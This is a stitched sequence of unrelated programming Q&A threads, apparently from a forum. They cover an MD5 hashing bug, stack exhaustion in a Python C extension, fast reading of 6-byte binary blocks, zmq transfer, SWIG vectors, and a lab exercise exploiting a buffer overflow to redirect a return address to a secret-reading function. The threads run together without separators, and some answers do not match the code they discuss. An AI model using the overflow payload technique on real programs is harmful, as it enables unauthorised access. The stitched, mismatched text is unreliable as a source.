t.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/md5.h>
static char *unsigned_to_signed_char(const unsigned char *in, int len) {
    char *res = (char *)malloc(len * 2 + 1);
    int i = 0;
    memset(res, 0, len * 2 + 1);
    while (i < len) {
        sprintf(res + i * 2, "%02x", in[i]);
        i++;
    }
    return res;
}
static unsigned char *md5(const unsigned char *in) {
    MD5_CTX ctx;
    unsigned char *result1 = (unsigned char *)malloc(MD5_DIGEST_LENGTH);
    MD5_Init(&ctx);
    printf("len: %lu \n", strlen(in));
    MD5_Update(&ctx, in, strlen(in));
    MD5_Final(result1, &ctx);
    return result1;
}
int main(int argc, char *argv[])
{
    const char *i = "abcdef";
    unsigned char *data = (unsigned char *)malloc(strlen(i) + 1);
    strncpy(data, i, strlen(i));
    unsigned char *result1 = md5(data);
    free(data);
    printf("%s\n", unsigned_to_signed_char(result1, MD5_DIGEST_LENGTH));
    unsigned char *result2 = md5(result1);
    free(result1);
    printf("%s\n", unsigned_to_signed_char(result2, MD5_DIGEST_LENGTH));
    unsigned char *result3 = md5(result2);
    free(result2);
    printf("%s\n", unsigned_to_signed_char(result3, MD5_DIGEST_LENGTH));
    return 0;
}
Makefile
all:
	cc t.c -Wall -L/usr/local/lib -lcrypto
and t.py
#!/usr/bin/env python
import hashlib
import binascii
src = 'abcdef'
a = hashlib.md5(src).digest()
b = hashlib.md5(a).digest()
c = hashlib.md5(b).hexdigest().upper()
print binascii.b2a_hex(a)
print binascii.b2a_hex(b)
print c
The results of the Python script on Debian 6 x86 and Mac OS 10.6 are the same:
e80b5017098950fc58aad83c8c14978e
b91282813df47352f7fe2c0c1fe9e5bd
85E4FBD1BD400329009162A8023E1E4B
The output of the C version on Mac OS is:
len: 6
e80b5017098950fc58aad83c8c14978e
len: 48
eac9eaa9a4e5673c5d3773d7a3108c18
len: 64
73f83fa79e53e9415446c66802a0383f
Why is it different from Debian 6?
Debian environment:
gcc (Debian 4.4.5-8) 4.4.5
Python 2.6.6
Linux shuge-lab 2.6.26-2-686 #1 SMP Thu Nov 25 01:53:57 UTC 2010 i686 GNU/Linux
OpenSSL was installed from the testing repository.
MacOS environment:
i686-apple-darwin10-gcc-4.2.1 (GCC) 4.2.1 (Apple Inc. build 5666) (dot 3)
Python 2.7.1
Darwin Lees-Box.local 10.7.0 Darwin Kernel Version 10.7.0: Sat Jan 29 15:17:16 PST 2011; root:xnu-1504.9.37~1/RELEASE_I386 i386
OpenSSL was installed from MacPorts.
openssl #1.0.0d (devel, security)
OpenSSL SSL/TLS cryptography library
I think you are allocating exactly the number of bytes needed for the MD5 result, without the terminating \0. You are then calculating the MD5 of a block of memory that starts with the result of the previous MD5 calculation but has some random bytes after it. You should allocate one more byte for the result and set it to \0.
My proposal:
...
unsigned char * result1 = (unsigned char *)malloc(MD5_DIGEST_LENGTH + 1);
result1[MD5_DIGEST_LENGTH] = 0;
...
The answers so far don't seem to me to have stated the issue clearly enough. Specifically the problem is the line:
MD5_Update(&ctx, in, strlen(in));
The data block you pass in is not '\0'-terminated, so the call to MD5_Update() may try to process further bytes beyond the end of the MD5_DIGEST_LENGTH-byte buffer. In short, stop using strlen() to work out the length of an arbitrary buffer of bytes: you know how long the buffers are supposed to be, so pass the length around.
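A minimal sketch of that fix, with the length passed explicitly (md5_buf is a renamed variant of the question's md5(), not part of the original code):
#include <openssl/md5.h>
#include <stdlib.h>
static unsigned char *md5_buf(const unsigned char *in, size_t len)
{
    unsigned char *out = (unsigned char *)malloc(MD5_DIGEST_LENGTH);
    MD5_CTX ctx;
    MD5_Init(&ctx);
    MD5_Update(&ctx, in, len); /* the caller supplies the exact length */
    MD5_Final(out, &ctx);
    return out;
}
The call sites then become, for example:
unsigned char *result1 = md5_buf((const unsigned char *)"abcdef", 6);
unsigned char *result2 = md5_buf(result1, MD5_DIGEST_LENGTH);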
You don't '\0'-terminate the string you're passing to md5 (which I suppose takes a '\0'-terminated string, since you don't pass it the length). The code
memset( data, 0, sizeof( strlen( i ) ) );
memcpy( data, i, strlen( i ) );
is completely broken: sizeof( strlen( i ) ) is the same as sizeof( size_t ), 4 or 8 on typical machines. But you don't want the memset anyway. Try replacing these with:
strcpy( data, i );
Or better yet:
std::string i( "abcdef" );
, then pass i.c_str() to md5 (and declare md5 to take a char const*). (I'd use an std::vector<unsigned char> in md5() as well, and have it return it. And unsigned_to_signed_char would take the std::vector<unsigned char> and return std::string.)
I'm writing a Python extension module in C. Python stops running when I declare an array of structs with more than 4 elements in a function of that module.
I'm writing the module to increase performance.
I've declared 3 structs ("SKU", "Cromosoma", "Aptitud") and I want to create an array of Cromosoma, but when I try to create the array with more than 4 elements it breaks.
// need_for_speed.c extension module code
#include <Python.h>
#include <stdlib.h>
#include <string.h> // for strcpy
#define MAX_GENES_SIZE 2000
typedef struct {
    char codigo[30];
    double venta;
    char nombre[100];
    double categoria;
    double peso;
    double ubicacion_especifica;
    double ubicacion_actual;
    double ubicacion_a_mover;
    double stock;
} SKU;

typedef struct {
    double ubicaciones_rompe_regla;
    double cercania_medio;
    double desv_std_picks_x_seccion;
    double peso_x_ubicacion;
} Aptitud;

typedef struct {
    SKU genes[MAX_GENES_SIZE];
    Aptitud aptitud;
    int genes_size;
    int edad;
} Cromosoma;
static PyObject* prueba(PyObject* self, PyObject* args){
    Cromosoma a;
    SKU s;
    strcpy(s.codigo, "1212");
    a.genes[0] = s;
    Cromosoma poblacion[] = {a, a, a, a, a};
    printf("codigo %s ", poblacion[0].genes[0].codigo);
    return PyLong_FromDouble(1);
}
static PyMethodDef Methods[] = {
    {"prueba", prueba, METH_NOARGS, "Prueba general"},
    {NULL, NULL, 0, NULL}
};
// Module Definition struct
static struct PyModuleDef need_for_speed = {
    PyModuleDef_HEAD_INIT,
    "need_for_speed",
    "Modulo para aumento de la velocidad de procesamiento para el algoritmo genético",
    -1,
    Methods
};
// Initialize module
PyMODINIT_FUNC PyInit_need_for_speed(void)
{
    PyObject *m;
    m = PyModule_Create(&need_for_speed);
    return m;
}
the setup.py to build this module:
from distutils.core import setup, Extension

setup(name='need_for_speed', version='1.0',
      ext_modules=[Extension('need_for_speed', ['need_for_speed.c'])])
command to build module:
python setup.py build
when I call the function prueba:
import need_for_speed
i = need_for_speed.prueba()
Python stops running without printing or returning anything, but if I modify the array named "poblacion" in the "prueba" function to have only 4 elements, it runs perfectly, returning 1 and printing "codigo 1212".
I'm using Windows, BTW.
It's probably a stack overflow.
Let's see how large your structs are assuming they only take the size of the individual members (neglecting padding, etc.):
SKU: 7 doubles and 130 chars -> 7 * 8 bytes + 130 bytes -> 186 bytes
Aptitud: 4 doubles -> 4 * 8 bytes -> 32 bytes
Cromosoma: 2 ints, 1 Aptitud and 2000 SKU -> 2 * 4 bytes + 32 bytes + 2000 * 186 bytes -> 372040 bytes
So one instance of Cromosoma will take ~372 kB, and you create five or six of them: one with Cromosoma a, plus one for each slot in the array (four or five).
A typical stack is only a few megabytes. With 6 * 372 kB ≈ 2.2 MB, it is at least plausible that you exhausted your stack. For example, MSVC (the Microsoft Visual C++ compiler) uses just 1 MB by default. Given that it fails with an array of size 5 but works with one of size 4, it seems you have ~2 MB of stack.
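A quick way to check this estimate (a sketch; it assumes the struct definitions from the question are in scope) is to print the real sizes, which also include any padding the compiler adds:
#include <stdio.h>

int main(void)
{
    printf("sizeof(SKU)       = %zu\n", sizeof(SKU));
    printf("sizeof(Aptitud)   = %zu\n", sizeof(Aptitud));
    printf("sizeof(Cromosoma) = %zu\n", sizeof(Cromosoma));
    return 0;
}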
To avoid this problem you could increase your stack size (how you do that depends on your compiler). However, increasing the stack size will again lead to problems when you need more Cromosoma instances or change the number of SKUs.
Another alternative (probably better than increasing the stack size) is to allocate all big arrays on the heap. For example you could allocate poblacion on the heap, as in the sketch below, and/or make Cromosoma.genes a pointer to a heap-allocated array of SKU.
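A sketch of prueba with poblacion moved to the heap (minimal error handling; the rest of the module is unchanged):
static PyObject* prueba(PyObject* self, PyObject* args){
    /* ~1.8 MB now lives on the heap instead of the stack */
    Cromosoma *poblacion = malloc(5 * sizeof(Cromosoma));
    if (poblacion == NULL)
        return PyErr_NoMemory();
    strcpy(poblacion[0].genes[0].codigo, "1212");
    printf("codigo %s ", poblacion[0].genes[0].codigo);
    free(poblacion);
    return PyLong_FromDouble(1);
}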
I'm reading a file in C++ and Python as a binary file. I need to divide the binary into blocks of 6 bytes each. For example, if my file is 600 bytes, the result should be 100 blocks of 6 bytes.
I have tried struct (in C++ and Python) and array (Python). Neither divides the binary into blocks of 6 bytes; they can only divide it into blocks whose size is a power of two (1, 2, 4, 8, 16, etc.).
The array approach was very fast, reading 1 GB of binary data as 4-byte blocks in less than a second. In contrast, the other methods I tried were extremely slow, taking tens of minutes for a few megabytes.
How can I read the binary as blocks of 6 bytes as fast as possible? Any help in either C++ or Python would be great. Thank you.
EDIT - The Code:
struct Block
{
    char data[6];
};
class BinaryData
{
private:
    char data[6];
public:
    BinaryData() {};
    ~BinaryData() {};
    void readBinaryFile(string strFile)
    {
        Block block;
        ifstream binaryFile;
        int size = 0;
        binaryFile.open(strFile, ios::out | ios::binary);
        binaryFile.seekg(0, ios::end);
        size = (int)binaryFile.tellg();
        binaryFile.seekg(0, ios::beg);
        cout << size << endl;
        while ((int)binaryFile.tellg() < size)
        {
            cout << binaryFile.tellg() << " , " << size << " , " <<
                size - (int)binaryFile.tellg() << endl;
            binaryFile.read((char*)block.data, sizeof(block.data));
            cout << block.data << endl;
            //cin >> block.data;
            if (size - (int)binaryFile.tellg() > size)
            {
                break;
            }
        }
        binaryFile.close();
    }
};
Notes:
- In the file, the numbers are stored big endian.
- The goal is to read them as fast as possible, then sort them in ascending order.
Let's start simple, then optimize.
Simple Loop
uint8_t array1[6];
while (my_file.read((char *) &array1[0], 6))
{
    Process_Block(&array1[0]);
}
The above code reads the file 6 bytes at a time and sends each block to a function.
It meets the requirements, but is not very optimal.
Reading Larger Blocks
Files are streaming devices. They have an overhead to start streaming, but are very efficient once they keep streaming. In other words, we want to read as much data per transaction as possible to reduce the overhead.
static const unsigned int CAPACITY = 6 * 1024;
uint8_t block1[CAPACITY];
// the "|| gcount() > 0" clause makes sure a final, partial chunk is processed too
while (my_file.read((char *) &block1[0], CAPACITY) || my_file.gcount() > 0)
{
    const size_t bytes_read = my_file.gcount();
    size_t blocks_read = bytes_read / 6; // must be mutable: it is counted down below
    uint8_t const * block_pointer = &block1[0];
    while (blocks_read > 0)
    {
        Process_Block(block_pointer);
        block_pointer += 6;
        --blocks_read;
    }
}
The above code reads up to 1024 blocks in one transaction. After reading, each block is sent to a function for processing.
This version is more efficient than the Simple Loop, as it reads more data per transaction. Adjust the CAPACITY to find the optimal size on your platform.
Loop Unrolling
The previous code reduces the first bottleneck of input transfer speed (although there is still room for optimization). Another technique is to reduce the overhead of the processing loop by performing more data processing inside the loop. This is called loop unrolling.
const size_t bytes_read = my_file.gcount();
size_t blocks_read = bytes_read / 6; // again mutable: decremented in both loops
uint8_t const * block_pointer = &block1[0];
while ((blocks_read / 4) != 0)
{
    Process_Block(block_pointer);
    block_pointer += 6;
    Process_Block(block_pointer);
    block_pointer += 6;
    Process_Block(block_pointer);
    block_pointer += 6;
    Process_Block(block_pointer);
    block_pointer += 6;
    blocks_read -= 4;
}
while (blocks_read > 0)
{
    Process_Block(block_pointer);
    block_pointer += 6;
    --blocks_read;
}
You can adjust the quantity of operations in the loop, to see how it affects your program's speed.
Multi-Threading & Multiple Buffers
Two more techniques for speeding up the reading of the data are to use multiple threads and multiple buffers.
One thread, an input thread, reads the file into a buffer. After reading into the first buffer, the thread sets a semaphore indicating there is data to process. The input thread reads into the next buffer. This repeats until the data is all read. (For a challenge, figure out how to reuse the buffers and notify the other thread of which buffers are available).
The second thread is the processing thread. This processing thread is started first and waits for the first buffer to be completely read. After the buffer has the data, the processing thread starts processing the data. After the first buffer has been processed, the processing thread starts on the next buffer. This repeats until all the buffers have been processed.
The goal here is to use as many buffers as necessary to keep the processing thread running and not waiting.
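A minimal sketch of that scheme, using POSIX threads and unnamed semaphores (both assumed available; the buffer count, CAPACITY, and Process_Block are placeholders, and error handling is omitted):
#include <pthread.h>
#include <semaphore.h>
#include <stdint.h>
#include <stdio.h>

#define CAPACITY    (6 * 1024)
#define NUM_BUFFERS 2

static uint8_t buffers[NUM_BUFFERS][CAPACITY];
static size_t  bytes_in[NUM_BUFFERS];
static sem_t   filled[NUM_BUFFERS]; /* posted when a buffer holds data */
static sem_t   empty[NUM_BUFFERS];  /* posted when a buffer is free again */

extern void Process_Block(const uint8_t *block);

static void *input_thread(void *arg)
{
    FILE *f = (FILE *)arg;
    for (int idx = 0; ; idx = (idx + 1) % NUM_BUFFERS) {
        sem_wait(&empty[idx]);  /* wait until this buffer is free */
        bytes_in[idx] = fread(buffers[idx], 1, CAPACITY, f);
        sem_post(&filled[idx]); /* hand it to the processing thread */
        if (bytes_in[idx] == 0) /* EOF: an empty buffer is the stop signal */
            break;
    }
    return NULL;
}

static void *processing_thread(void *arg)
{
    (void)arg;
    for (int idx = 0; ; idx = (idx + 1) % NUM_BUFFERS) {
        sem_wait(&filled[idx]); /* wait for data */
        if (bytes_in[idx] == 0)
            break;              /* input thread signalled EOF */
        for (size_t off = 0; off + 6 <= bytes_in[idx]; off += 6)
            Process_Block(&buffers[idx][off]);
        sem_post(&empty[idx]);  /* recycle the buffer */
    }
    return NULL;
}

int main(void)
{
    FILE *f = fopen("data.bin", "rb"); /* file name is a placeholder */
    for (int i = 0; i < NUM_BUFFERS; ++i) {
        sem_init(&filled[i], 0, 0);
        sem_init(&empty[i], 0, 1); /* every buffer starts out free */
    }
    pthread_t in_t, proc_t;
    pthread_create(&proc_t, NULL, processing_thread, NULL);
    pthread_create(&in_t, NULL, input_thread, f);
    pthread_join(in_t, NULL);
    pthread_join(proc_t, NULL);
    fclose(f);
    return 0;
}
Both threads visit the buffers in the same order, so each buffer alternates cleanly between them; more buffers help when read and processing times fluctuate.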
Edit 1: Other techniques
Memory Mapped Files
Some operating systems support memory mapped files. The OS reads a portion of the file into memory. When a location outside the memory is accessed, the OS loads another portion into memory. Whether this technique improves performance needs to be measured (profiled).
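For example, a sketch of that approach on POSIX systems (mmap is assumed to be available; on Windows the equivalent would be CreateFileMapping/MapViewOfFile). Process_Block is again a placeholder:
#include <fcntl.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

extern void Process_Block(const uint8_t *block);

void process_mapped_file(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return;
    struct stat st;
    if (fstat(fd, &st) == 0 && st.st_size >= 6) {
        uint8_t *base = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
        if (base != MAP_FAILED) {
            /* the OS pages the file in on demand; we just walk the mapping */
            for (off_t off = 0; off + 6 <= st.st_size; off += 6)
                Process_Block(base + off);
            munmap(base, st.st_size);
        }
    }
    close(fd);
}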
Parallel Processing & Threading
Adding multiple threads may show negligible performance gain. Computers have a data bus (data highway) connecting many hardware devices, including memory, file I/O and the processor. Devices are paused to let other devices use the data highway. With multiple cores or processors, one processor may have to wait while the other is using the data highway. Because of this waiting, multiple threads or parallel processing may yield only a negligible gain. The operating system also has overhead for creating and maintaining threads.
Try this. The input file is given as an argument to the program. As you said, I assume the 6-byte values in the file are written in big-endian order, but I make no such assumption about the machine that reads and sorts them: the program works on both little- and big-endian hosts (the case is checked at execution time).
#include <iostream>
#include <fstream>
#include <vector>
#include <cstdint>
#include <algorithm>
#include <limits.h> // CHAR_BIT
using namespace std;
#if CHAR_BIT != 8
# error this code assumes a char has 8 bits
#endif
int main(int argc, char ** argv)
{
    if (argc != 2)
        cerr << "Usage: " << argv[0] << " <file>" << endl;
    else {
        ifstream in(argv[1], ios::binary);
        if (!in.is_open())
            cerr << "Cannot open " << argv[1] << endl;
        else {
            in.seekg(0, ios::end);
            size_t n = (size_t) in.tellg() / 6;
            vector<uint64_t> values(n);
            uint64_t * p = values.data(); // for performance
            uint64_t * psup = p + n;
            in.seekg(0, ios::beg);
            int i = 1;
            if (*((char *) &i)) {
                // little endian host: reverse the bytes of each value
                unsigned char s[6];
                uint64_t v = 0;
                while (p != psup) {
                    if (!in.read((char *) s, 6))
                        return -1;
                    ((char *) &v)[0] = s[5];
                    ((char *) &v)[1] = s[4];
                    ((char *) &v)[2] = s[3];
                    ((char *) &v)[3] = s[2];
                    ((char *) &v)[4] = s[1];
                    ((char *) &v)[5] = s[0];
                    *p++ = v;
                }
            }
            else {
                // big endian host: read directly into the low 6 bytes
                uint64_t v = 0;
                while (p != psup) {
                    if (!in.read(((char *) &v) + 2, 6))
                        return -1;
                    *p++ = v;
                }
            }
            cout << "file successfully read" << endl;
            sort(values.begin(), values.end());
            cout << "values sorted" << endl;
            // DEBUG, DO ON A SMALL FILE ;-)
            for (auto v : values)
                cout << v << endl;
        }
    }
}
So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void read_secret() {
    FILE *fptr = fopen("/task2/secret.txt", "r");
    char secret[1024];
    fscanf(fptr, "%512s", secret);
    printf("Well done!\nThere you go, a wee reward: %s\n", secret);
    exit(0);
}

int fib(int n)
{
    if (n == 0)
        return 0;
    else if (n == 1)
        return 1;
    else
        return (fib(n-1) + fib(n-2));
}

void vuln(char *name)
{
    int n = 20;
    char buf[1024];
    int f[n];
    int i;
    for (i = 0; i < n; i++) {
        f[i] = fib(i);
    }
    strcpy(buf, name);
    printf("Welcome %s!\n", buf);
    for (i = 0; i < 20; i++) {
        printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
    }
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("Tell me your names, tricksy hobbitses!\n");
        return 0;
    }
    // printf("main function at %p\n", main);
    // printf("read_secret function at %p\n", read_secret);
    vuln(argv[1]);
    return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I pass a large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, so that vuln returns to the read_secret function instead of back to main.
But I'm pretty stuck here. I know I have to use GDB to get the address of the read_secret function, and that I have to overwrite the saved return address with it, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability, you first have to identify the offset at which you can get a segfault. In your case I assume it's 1026. The whole game is to overwrite the saved return address (which gets loaded into EIP, the register that tells the program what to execute next) and replace it with your own target.
To find the address of said function, open your program in gdb and type:
x function_name
Then copy the address. You then have to convert it to little- or big-endian byte order; I do it with the struct module in Python.
import struct
struct.pack("<I", address)  # "<I" packs little endian; use ">I" for big endian
Then you have to add it to the input you give the binary. Since the program takes the name from argv[1], pass the payload as an argument, something like:
/task2/vuln "$(python -c "print 'a' * 1026 + 'the_address'")"
# in a bash shell, not in the script
If all of this doesn't work, just add a few more characters to your offset; there might be something you didn't see coming.
/task2/vuln "$(python -c "print 'a' * 1034 + 'the_address'")"
Hope that answers your question.
I want to serialize raw image data, i.e. a uint16 array, and send it over to Python using zmq. I considered using msgpack-c, but the only way I found was the one given in "How do I unpack and extract data properly using msgpack-c?". If I follow this approach I have to pack each element of my C array separately, which will make it very slow.
Could someone please point me in the right direction?
You can send uint16_t array from c side as is, and use ctypes module to access it in python code.
Sending c code:
#include <stdint.h>
#include <stdio.h>
#include <zmq.h>
#define IMAGE_SIZE (256 * 256)
unsigned checksum(uint16_t* data, int len) {
    unsigned s = 0;
    for (int i = 0; i < len; ++i) {
        s += data[i];
    }
    return s;
}
int main() {
    uint16_t image[IMAGE_SIZE]; // left uninitialized: only the matching checksums matter for this demo
    printf("image checksum: %u\n", checksum(image, IMAGE_SIZE));
    void* context = zmq_ctx_new();
    void* push = zmq_socket(context, ZMQ_PUSH);
    zmq_connect(push, "tcp://127.0.0.1:5555");
    zmq_send(push, image, IMAGE_SIZE * sizeof(uint16_t), 0);
    zmq_close(push);
    zmq_ctx_destroy(context);
    return 0;
}
Receiving python code:
from ctypes import c_uint16
import zmq
IMAGE_SIZE = 256 * 256
Image = c_uint16 * IMAGE_SIZE # corresponds to uint16_t[IMAGE_SIZE]
context = zmq.Context(1)
pull = zmq.Socket(context, zmq.PULL)
pull.bind("tcp://127.0.0.1:5555")
message = pull.recv()
image = Image.from_buffer_copy(message)
# This should print the same number as the sending code
# Note that it is different from sum(message)
print(sum(image))
This may be a noob question, but here it goes. I have wrapped a 3D vector in a Python module using SWIG. Everything compiles, and I can import the module and perform actions with it. However, I can't figure out how to access my vector in Python to store and change its values. The code below was written to test whether the STL <algorithm> header works with SWIG. It does seem to work, but I still need a way to put values into my vector from Python.
header.h
#ifndef HEADER_H_INCLUDED
#define HEADER_H_INCLUDED
#include <vector>
using namespace std;
struct myStruct {
    int vecd1, vecd2, vecd3;
    vector<vector<vector<double> > > vec3d;
    void vecSizer();
    void deleteDuplicates();
    double vecSize();
    void run();
};
#endif // HEADER_H_INCLUDED
main.cpp
#include "header.h"
#include <vector>
#include <algorithm>
void myStruct::vecSizer()
{
    vec3d.resize(vecd1);
    for (int i = 0; i < vec3d.size(); i++)
    {
        vec3d[i].resize(vecd2);
        for (int j = 0; j < vec3d[i].size(); j++)
        {
            vec3d[i][j].resize(vecd3);
        }
    }
}
void myStruct::deleteDuplicates()
{
    vector<vector<vector<double> > >::iterator it;
    sort(vec3d.begin(), vec3d.end());
    it = unique(vec3d.begin(), vec3d.end());
    vec3d.resize(distance(vec3d.begin(), it));
}

double myStruct::vecSize()
{
    return vec3d.size();
}

void myStruct::run()
{
    vecSizer();
    deleteDuplicates();
    vecSize();
}
from the terminal (Ubuntu)
>>> import test              # import the SWIG-generated module
>>> x = test.myStruct()      # create an instance of myStruct
>>> x.vecSize()              # should be 0, since the vector dimensions are not initialized
0.0
>>> x.vec3d                  # check that vec3d exists and is of the correct type
<Swig Object of type 'vector< vector< vector< double > > > *' at 0x7fe6a483c8d0>
Thanks in advance!
It turns out that the vectors are converted to immutable Python objects when the wrapper/interface is generated. So, in short, you cannot modify wrapped C++ vectors from Python.